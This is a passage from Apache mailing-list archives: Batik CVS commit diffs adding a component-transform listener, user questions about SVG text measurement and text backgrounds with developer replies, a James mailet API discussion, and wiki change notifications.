Ratio. + float xMin, yMin, width, height; + if (xStart < xCurrent) { + xMin = xStart; + width = xCurrent - xStart; + } else { + xMin = xCurrent; + width = xStart - xCurrent; + } + if (yStart < yCurrent) { + yMin = yStart; + height = yCurrent - yStart; + } else { + yMin = yCurrent; + height = yStart - yCurrent; + } + Dimension d = c.getSize(); + float compAR = d.width/(float)d.height; + if (compAR > width/height) { + width = compAR*height; + } else { + height = width/compAR; + } + + markerTop = new Line2D.Float(xMin, yMin, xMin+width, yMin); + markerLeft = new Line2D.Float(xMin, yMin, xMin, yMin+height); + markerBottom = new Line2D.Float(xMin, yMin+height, + xMin+width, yMin+height); + markerRight = new Line2D.Float(xMin+width, yMin, + xMin+width, yMin+height); overlay.paint(c.getGraphics()); } 1.31 +28 -1 xml-batik/sources/org/apache/batik/swing/gvt/JGVTComponent.java Index: JGVTComponent.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/swing/gvt/JGVTComponent.java,v retrieving revision 1.30 retrieving revision 1.31 diff -u -r1.30 -r1.31 --- JGVTComponent.java 24 Feb 2003 18:25:54 -0000 1.30 +++ JGVTComponent.java 26 Feb 2003 11:13:45 -0000 1.31 @@ -141,6 +141,11 @@ protected List overlays = new LinkedList(); /** + * The JGVTComponentListener list. + */ + protected List jgvtListeners = null; + + /** * The event dispatcher. */ protected AWTEventDispatcher eventDispatcher; @@ -234,6 +239,18 @@ return image; } + + public void addJGVTComponentListener(JGVTComponentListener listener) { + if (jgvtListeners == null) + jgvtListeners = new LinkedList(); + jgvtListeners.add(listener); + } + + public void removeJGVTComponentListener(JGVTComponentListener listener) { + if (jgvtListeners == null) return; + jgvtListeners.remove(listener); + } + /** * Resets the rendering transform to its initial value. */ @@ -500,6 +517,16 @@ handleException(e); } } + if (jgvtListeners != null) { + Iterator iter = jgvtListeners.iterator(); + ComponentEvent ce = new ComponentEvent + (this, JGVTComponentListener.COMPONENT_TRANSFORM_CHANGED); + while (iter.hasNext()) { + JGVTComponentListener l = (JGVTComponentListener)iter.next(); + l.componentTransformChanged(ce); + } + } + if (performRedraw) scheduleGVTRendering(); } 1.1 xml-batik/sources/org/apache/batik/swing/gvt/JGVTComponentAdapter.java Index: JGVTComponentAdapter.java =================================================================== /***************************************************************************** * Copyright (C) The Apache Software Foundation. All rights reserved. * * ------------------------------------------------------------------------- * * This software is published under the terms of the Apache Software License * * version 1.1, a copy of which has been included with this distribution in * * the LICENSE file. * *****************************************************************************/ package org.apache.batik.swing.gvt; import java.awt.event.ComponentAdapter; import java.awt.event.ComponentEvent; public class JGVTComponentAdapter implements JGVTComponentListener { /** * Called when the rendering transform * changes on the JGVTComponentListener */ public void componentTransformChanged (ComponentEvent event) { } } 1.1 xml-batik/sources/org/apache/batik/swing/gvt/JGVTComponentListener.java Index: JGVTComponentListener.java =================================================================== /***************************************************************************** * Copyright (C) The Apache Software Foundation. All rights reserved. * * ------------------------------------------------------------------------- * * This software is published under the terms of the Apache Software License * * version 1.1, a copy of which has been included with this distribution in * * the LICENSE file. * *****************************************************************************/ package org.apache.batik.swing.gvt; import java.awt.event.ComponentListener; import java.awt.event.ComponentEvent; public interface JGVTComponentListener { public static int COMPONENT_TRANSFORM_CHANGED = ComponentEvent.COMPONENT_LAST+1234; /** * Called when the rendering transform * changes on the JGVTComponentListener */ public void componentTransformChanged (ComponentEvent event); } 1.64 +117 -4 xml-batik/sources/org/apache/batik/swing/svg/JSVGComponent.java Index: JSVGComponent.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/swing/svg/JSVGComponent.java,v retrieving revision 1.63 retrieving revision 1.64 diff -u -r1.63 -r1.64 --- JSVGComponent.java 25 Feb 2003 10:30:57 -0000 1.63 +++ JSVGComponent.java 26 Feb 2003 11:13:46 -0000 1.64 @@ -20,9 +20,12 @@ import java.awt.event.KeyEvent; import java.awt.event.MouseEvent; +import java.awt.event.ComponentEvent; +import java.awt.event.ComponentAdapter; import java.awt.geom.AffineTransform; import java.awt.geom.Dimension2D; +import java.awt.geom.Point2D; import java.awt.geom.NoninvertibleTransformException; import java.util.ArrayList; @@ -69,6 +72,7 @@ import org.apache.batik.swing.gvt.GVTTreeRendererEvent; import org.apache.batik.swing.gvt.JGVTComponent; +import org.apache.batik.swing.gvt.JGVTComponentListener; import org.apache.batik.util.ParsedURL; import org.apache.batik.util.RunnableQueue; @@ -310,6 +314,8 @@ */ protected int documentState; + protected Dimension prevComponentSize; + /** * Creates a new JSVGComponent. */ @@ -640,15 +646,55 @@ try { SVGSVGElement elt = svgDocument.getRootElement(); Dimension d = getSize(); + Dimension oldD = prevComponentSize; + prevComponentSize = d; if (d.width < 1) d.width = 1; if (d.height < 1) d.height = 1; AffineTransform at = ViewBox.getViewTransform (fragmentIdentifier, elt, d.width, d.height); CanvasGraphicsNode cgn = getCanvasGraphicsNode(); - if (!at.equals(cgn.getViewingTransform())) { + AffineTransform vt = cgn.getViewingTransform(); + if (!at.equals(vt)) { + if (oldD == null) + oldD = d; + // Here we map the old center of the component down to + // the user coodinate system with the old viewing + // transform and then back to the screen with the + // new viewing transform. We then adjust the rendering + // transform so it lands in the same place. + Point2D pt = new Point2D.Float(oldD.width/2.0f, + oldD.height/2.0f); + AffineTransform rendAT = getRenderingTransform(); + if (rendAT != null) { + try { + AffineTransform invRendAT = rendAT.createInverse(); + pt = invRendAT.transform(pt, null); + } catch (NoninvertibleTransformException e) { } + } + if (vt != null) { + try { + AffineTransform invVT = vt.createInverse(); + pt = invVT.transform(pt, null); + } catch (NoninvertibleTransformException e) { } + } + if (at != null) + pt = at.transform(pt, null); + if (rendAT != null) + pt = rendAT.transform(pt, null); + + // Now figure out how far we need to shift things + // to get the center point to line up again. + float dx = (float)((d.width/2.0f) -pt.getX()); + float dy = (float)((d.height/2.0f)-pt.getY()); + // Round the values to nearest integer. + dx = (int)((dx < 0)?(dx - .5):(dx + .5)); + dy = (int)((dy < 0)?(dy - .5):(dy + .5)); + if ((dx != 0) || (dy != 0)) { + rendAT.preConcatenate + (AffineTransform.getTranslateInstance(dx, dy)); + setRenderingTransform(rendAT, false); + } cgn.setViewingTransform(at); - if (renderer != null) - renderer.setTree(gvtRoot); return true; } } catch (BridgeException e) { @@ -815,6 +861,67 @@ } /** + * The JGVTComponentListener. + */ + protected JSVGComponentListener jsvgComponentListener = + new JSVGComponentListener(); + + class JSVGComponentListener extends ComponentAdapter + implements JGVTComponentListener { + float prevScale = 0; + float prevTransX = 0; + float prevTransY = 0; + + public void componentResized(ComponentEvent ce) { + if (updateManager != null && updateManager.isRunning()) { + updateManager.getUpdateRunnableQueue().invokeLater + (new Runnable() { + public void run() { + try { + updateManager.dispatchSVGResizeEvent(); + } catch (InterruptedException ie) { + } + }}); + } + } + + public void componentTransformChanged(ComponentEvent event) { + AffineTransform at = getRenderingTransform(); + + float currScale = (float)Math.sqrt(at.getDeterminant()); + float currTransX = (float)at.getTranslateX(); + float currTransY = (float)at.getTranslateY(); + + final boolean dispatchZoom = (currScale != prevScale); + final boolean dispatchScroll = ((currTransX != prevTransX) || + (currTransX != prevTransX)); + if (updateManager != null && updateManager.isRunning()) { + updateManager.getUpdateRunnableQueue().invokeLater + (new Runnable() { + public void run() { + try { + if (dispatchZoom) + updateManager.dispatchSVGZoomEvent(); + if (dispatchScroll) + updateManager.dispatchSVGScrollEvent(); + } catch (InterruptedException ie) { + } + }}); + } + prevScale = currScale; + prevTransX = currTransX; + prevTransY = currTransY; + } + + public void updateMatrix(AffineTransform at) { + prevScale = (float)Math.sqrt(at.getDeterminant()); + prevTransX = (float)at.getTranslateX(); + prevTransY = (float)at.getTranslateY(); + } + } + + + /** * Creates an instance of Listener. */ protected Listener createListener() { @@ -901,6 +1008,8 @@ * The data of the event is initialized to the old document. */ public void gvtBuildStarted(GVTTreeBuilderEvent e) { + removeJGVTComponentListener(jsvgComponentListener); + removeComponentListener(jsvgComponentListener); } /** @@ -924,6 +1033,7 @@ (int)dim.getHeight())); SVGSVGElement elt = svgDocument.getRootElement(); Dimension d = getSize(); + prevComponentSize = d; if (d.width < 1) d.width = 1; if (d.height < 1) d.height = 1; AffineTransform at = ViewBox.getViewTransform @@ -932,6 +1042,9 @@ cgn.setViewingTransform(at); initialTransform = new AffineTransform(); setRenderingTransform(initialTransform, false); + jsvgComponentListener.updateMatrix(initialTransform); + addJGVTComponentListener(jsvgComponentListener); + addComponentListener(jsvgComponentListener); gvtRoot = null; if (isDynamicDocument && JSVGComponent.this.eventsEnabled) { --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Feb 26 19:25:25 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5126 invoked by uid 500); 26 Feb 2003 19:25:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5115 invoked from network); 26 Feb 2003 19:25:24 -0000 X-Originating-IP: [161.129.204.104] From: "Randy Leonard" <[email protected]> To: <[email protected]> Subject: Text measurement Date: Wed, 26 Feb 2003 12:25:35 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0361_01C2DD92.29D7D6D0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: <[email protected]> X-OriginalArrivalTime: 26 Feb 2003 19:25:28.0956 (UTC) FILETIME=[D23523C0:01C2DDCC] X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N ------=_NextPart_000_0361_01C2DD92.29D7D6D0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I am new to SVG, so please excuse what may be a simple question. I am interested in generating menu buttons for web portal applications = using Batik. Some menu buttons will be fixed length, others should vary = depending upon embedded text. From my research to date, it seems I = cannot write SVG which expands/contracts the size of the generated image = based on text measurement. As such, it seems I must read an SVG = template using SVGDOM and manipulate the SVG prior to passing it off to = the Transcoder for jpeg creation. My question is... does this seem like a reasonable approach. If so, is = there a class which permits text measurement so I can adjust the SVG to = accomodate variable text size. Thanks, Randy Leonard [email protected] ------=_NextPart_000_0361_01C2DD92.29D7D6D0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2>I am new to SVG, so please excuse what = may be a=20 simple question.</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV> <DIV><FONT face=3DArial size=3D2>I am interested in generating menu = buttons for web=20 portal applications&nbsp;using Batik.&nbsp; Some menu buttons will be = fixed=20 length, others should vary depending upon embedded text.&nbsp; From my = research=20 to date, it seems I cannot write SVG which expands/contracts the size of = the=20 generated image based on text measurement.&nbsp; As such, it seems I = must read=20 an SVG template using SVGDOM and manipulate the SVG prior to passing it = off to=20 the Transcoder for jpeg creation.</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV> <DIV><FONT face=3DArial size=3D2>My question is... does this seem like a = reasonable=20 approach.&nbsp; If so, is there a class which permits text measurement = so I can=20 adjust the SVG to accomodate variable text size.</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV> <DIV><FONT face=3DArial size=3D2>Thanks,</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Randy Leonard</FONT></DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D"mailto:[email protected]">[email protected]</= A></FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML> ------=_NextPart_000_0361_01C2DD92.29D7D6D0-- From [email protected] Thu Feb 27 12:38:53 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96998 invoked by uid 500); 27 Feb 2003 12:38:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96976 invoked from network); 27 Feb 2003 12:38:52 -0000 X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Thu, 27 Feb 2003 07:38:49 -0500 To: [email protected] Subject: RE: Text measurement In-Reply-To: <[email protected]> References: <[email protected]> X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N >>>>> "RL" == Randy Leonard <[email protected]> writes: RL> I am new to SVG, so please excuse what may be a simple question. RL> I am interested in generating menu buttons for web portal RL> applications using Batik. Some menu buttons will be fixed length, RL> others should vary depending upon embedded text. From my research RL> to date, it seems I cannot write SVG which expands/contracts the RL> size of the generated image based on text measurement. Correct. RL> As such, it seems I must read an SVG template using SVGDOM and RL> manipulate the SVG prior to passing it off to the Transcoder for RL> jpeg creation. Yup. RL> My question is... does this seem like a reasonable approach. If RL> so, is there a class which permits text measurement so I can RL> adjust the SVG to accomodate variable text size. It does seem like a reasonable approach and for most simple text should be fairly straight forward. The part of the SVG DOM that you are interested in is the SVGTextContentElement interface in section 10.17 of the SVG specification. Only last week Batik got support for this interface so you will need to use a CVS copy of Batik to do your work (at this point CVS is generally better than the last release anyway). This lets you query all the information you could ever want about the text. You might also take a look at SVGLocatable which can give simple bounding box information (which may be all you need for your text elements). --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Feb 27 12:51:37 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20203 invoked by uid 500); 27 Feb 2003 12:51:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20141 invoked from network); 27 Feb 2003 12:51:36 -0000 From: "Geeta Shukla" <[email protected]> To: <[email protected]> Subject: Background color for text elements Date: Thu, 27 Feb 2003 18:22:54 +0530 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Importance: Normal In-Reply-To: <[email protected]> X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Hi, The input to my project are SVG files with just text and lines elements. The requirement is that the user would right click on any of the text nodes and select a background color for the same. How can I set a background color to a text element? Looking forward to a reply, Geeta Shukla, India --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Feb 27 12:55:59 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27663 invoked by uid 500); 27 Feb 2003 12:55:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27579 invoked from network); 27 Feb 2003 12:55:58 -0000 X-Authentication-Warning: frog.rl.kodak.com: deweese set sender to [email protected] using -f From: Thomas E Deweese <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <[email protected]> Date: Thu, 27 Feb 2003 07:55:56 -0500 To: [email protected] Subject: RE: Background color for text elements In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> X-Mailer: VM 7.03 under Emacs 20.5.1 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N >>>>> "GS" == Geeta Shukla <[email protected]> writes: GS> The input to my project are SVG files with just text and lines GS> elements. The requirement is that the user would right click on GS> any of the text nodes and select a background color for the GS> same. How can I set a background color to a text element? In SVG text has no background (after all it get's quite tricky to define what 'background' is for text on a path for example). However if you are dealing with 'simple' cases like a single line of text not on a path, you can use the 'getBBox' method from SVGLocatable to calculate a rectangle that can be inserted into the DOM tree immediately before the text element to give the same visual effect as setting the background. GS> Looking forward to a reply, Geeta Shukla, India --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Wed Mar 05 11:04:37 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30678 invoked from network); 5 Mar 2008 11:04:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2008 11:04:36 -0000 Received: (qmail 91026 invoked by uid 500); 5 Mar 2008 11:04:32 -0000 Delivered-To: [email protected] Received: (qmail 90916 invoked by uid 500); 5 Mar 2008 11:04:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <mailet-api.james.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90833 invoked by uid 99); 5 Mar 2008 11:04:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 05 Mar 2008 03:04:32 -0800 X-ASF-Spam-Status: No, hits=4.1 required=10.0 tests=MSGID_FROM_MTA_HEADER,RCVD_NUMERIC_HELO,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO elysia.void.it) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 05 Mar 2008 11:03:55 +0000 Message-ID: <[email protected]> MIME-Version: 1.0 Received: from 161.129.204.104 ([161.129.204.104]) by elysia.void.it (JAMES SMTP Server 2.3.2) with SMTP ID 230; Wed, 5 Mar 2008 11:40:34 +0100 (CET) Date: Wed, 05 Mar 2008 11:40:26 +0100 From: Stefano Bagnara <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051206 Thunderbird/1.6a1 Mnenhy/161.129.204.104 To: [email protected] CC: James Developers List <[email protected]> Subject: Mailet changes (Was: 2.3.x vs trunk) References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Noel J. Bergman ha scritto: > Robert Burrell Donkin wrote: >> i think that moving the mailets into a separate project should make >> things move managable. > > In the long run, I agree. Even in the mid-term, we can compare the Mailets > in the new project with those in the release, and validate the changes. I agree this should be done. We have a mailet project and changes between mailet v2.3 and current trunk mailet are minor. >> a single consolidated library can used for both 2.x and 3.x releases (as > well as trunk). > > We'll may have to make some changes to allow that, since people didn't treat > the code in a manner that would ensure this simple statement. This would be > another benefit from your proposal. Separating the Mailet library from the > server would discourage people from changing them in lockstep. "people didn't treat the code.... "? Whom? What changes? Every single change we did in trunk mailets has been discussed in the mailing list. Most changes we did from 2.2.0 to 2.3.0 was to make sure some JAMES specific mailets could be made generic mailets (e.g: we moved some method from MailImpl to Mail in order to remove every cast to MailImpl in mailets). Here is instead a list of changes between mailet released in 2.3.0 and current mailet trunk code: GenericMailet - altered default logging to include mailet name + added checkInitParameters and arrayToString methods GenericMatcher - altered default logging to include mailet name MailAddress - constructor throws AddressException instead of ParseException - other changes by danny: http://svn.apache.org/viewvc?view=rev&revision=565772 http://issues.apache.org/jira/browse/MAILET-7 MailetContext - isLocalUser now expect a full email address. if no @ is there then @localhost is appended for the check. + added isLocalEmail As you can see changes are very limited and maybe the only issue that should be better checked is the MailAddress compatibility. Every other change since 2.3.0 seems to be backward compatible (I would say both binary and source compatible) > That said, we want to be able to evolve the Mailet API, in a controlled and > proper manner. > > --- Noel +1 we created mailet-api@ list, the mailet svn tree and the mailet jira because of this. Feel free to use one of this tools in order to discuss about your specific concerns about current mailet sources! I cross post to mailet-api so we can continue there. Stefano From [email protected] Mon Mar 17 08:04:18 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2007 invoked from network); 17 Mar 2008 08:04:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Mar 2008 08:04:18 -0000 Received: (qmail 82991 invoked by uid 500); 17 Mar 2008 08:04:16 -0000 Delivered-To: [email protected] Received: (qmail 82966 invoked by uid 500); 17 Mar 2008 08:04:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <mailet-api.james.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82955 invoked by uid 99); 17 Mar 2008 08:04:15 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 17 Mar 2008 01:04:15 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO py-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 17 Mar 2008 08:03:38 +0000 Received: by py-out-1112.google.com with SMTP id y63so6427031pyg.33 for <[email protected]>; Mon, 17 Mar 2008 01:03:49 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; bh=rmXoAqMr5PBxpDFTZfJCjG7Ro2NilCNFbjLQ/judLCs=; b=DL+HFSD289J7qnPzx8jEdp4r71mt0FR1FDchaeTS+LGL+i+9zVToH1e5L7i94iyVSB5mozP0I38xmhktvKXJp5CS7/ESvbIOMpy2Bau/S89p46YCqKbegLFnOp0fnk4YnUZn3CJtd2/8JyIXJ3KL0G2I+wILssD70FJILxRMCg4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=T4oYJEo1bxZeMa1esJJ7DXiKknsWE0c4VTROrb0J9qVL3BGKB79/x/WPpahFYoVTdjqP1rnQSEuAzDKvO4/1Q+fPyJiPrUnuZWI52iRCThnAfAKDDdfdSdB64dLuSDw+MiI+yhEQdRKPnIzErsZ6o/adFRAQzpxR4QdOx4OerEM= Received: by 161.129.204.104 with SMTP id q14mr30878854qbr.20.1205741028984; Mon, 17 Mar 2008 01:03:48 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 17 Mar 2008 01:03:48 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 17 Mar 2008 08:03:48 +0000 From: "Danny Angus" <[email protected]> Sender: [email protected] To: [email protected] Subject: Re: What is MailFactory for? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Google-Sender-Auth: ef0b658f23f327a1 X-Virus-Checked: Checked by ClamAV on apache.org OMG I competely missed this thread! Sorry. On Thu, Nov 29, 2007 at 6:53 PM, Robert Burrell Donkin <[email protected]> wrote: > On Nov 29, 2007 5:53 PM, Tim Stephenson <[email protected]> wrote: > > Yes sorry to all for the confusion I had realised I had pulled > > MailFactory out of the mailet-refactorings area but failed to reply to > > my own message. > > if you have any comments on MailFactory please feel free to post them > > danny's just started his new job but i'm sure he'll be very keen to > read your comments once he's able to catch up on his mail > > - robert >
From [email protected] Thu Apr 03 11:15:55 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99808 invoked from network); 3 Apr 2008 11:15:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Apr 2008 11:15:52 -0000 Received: (qmail 57404 invoked by uid 500); 3 Apr 2008 11:15:48 -0000 Delivered-To: [email protected] Received: (qmail 56978 invoked by uid 500); 3 Apr 2008 11:15:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 56967 invoked by uid 99); 3 Apr 2008 11:15:47 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 03 Apr 2008 04:15:47 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eos.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 03 Apr 2008 11:15:04 +0000 Received: from eos.apache.org (localhost [161.129.204.104]) by eos.apache.org (Postfix) with ESMTP id 7D17CD2E9 for <[email protected]>; Thu, 3 Apr 2008 11:15:24 +0000 (GMT) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Thu, 03 Apr 2008 11:15:24 -0000 Message-ID: <[email protected]> Subject: [Ws Wiki] Update of "FrontPage/Axis2C/releases/steps" by DineshPremalal X-Virus-Checked: Checked by ClamAV on apache.org Dear Wiki user, You have subscribed to a wiki page or wiki category on "Ws Wiki" for change notification. The following page has been changed by DineshPremalal: http://wiki.apache.org/ws/FrontPage/Axis2C/releases/steps ------------------------------------------------------------------------------ * index.html * doxygenconf file * build/win32/makefile + * library version numbers === Web Site === 1. Update the website --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Apr 09 06:48:21 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30336 invoked from network); 9 Apr 2008 06:48:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Apr 2008 06:48:19 -0000 Received: (qmail 67403 invoked by uid 500); 9 Apr 2008 06:48:16 -0000 Delivered-To: [email protected] Received: (qmail 66927 invoked by uid 500); 9 Apr 2008 06:48:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 66916 invoked by uid 99); 9 Apr 2008 06:48:14 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 08 Apr 2008 23:48:14 -0700 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eos.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 06:47:40 +0000 Received: from eos.apache.org (localhost [161.129.204.104]) by eos.apache.org (Postfix) with ESMTP id 732DED2D3 for <[email protected]>; Wed, 9 Apr 2008 06:47:53 +0000 (GMT) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Wed, 09 Apr 2008 06:47:53 -0000 Message-ID: <[email protected]> Subject: [Ws Wiki] Update of "ode/monitoring management console" by milinda X-Virus-Checked: Checked by ClamAV on apache.org Dear Wiki user, You have subscribed to a wiki page or wiki category on "Ws Wiki" for change notification. The following page has been changed by milinda: http://wiki.apache.org/ws/ode/monitoring_management_console New page: =Apache ODE Management and Monitoring Console Design= --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Apr 09 06:49:54 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31877 invoked from network); 9 Apr 2008 06:49:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Apr 2008 06:49:51 -0000 Received: (qmail 69729 invoked by uid 500); 9 Apr 2008 06:49:49 -0000 Delivered-To: [email protected] Received: (qmail 69339 invoked by uid 500); 9 Apr 2008 06:49:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk Reply-To: [email protected] list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <general.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 69318 invoked by uid 99); 9 Apr 2008 06:49:47 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org 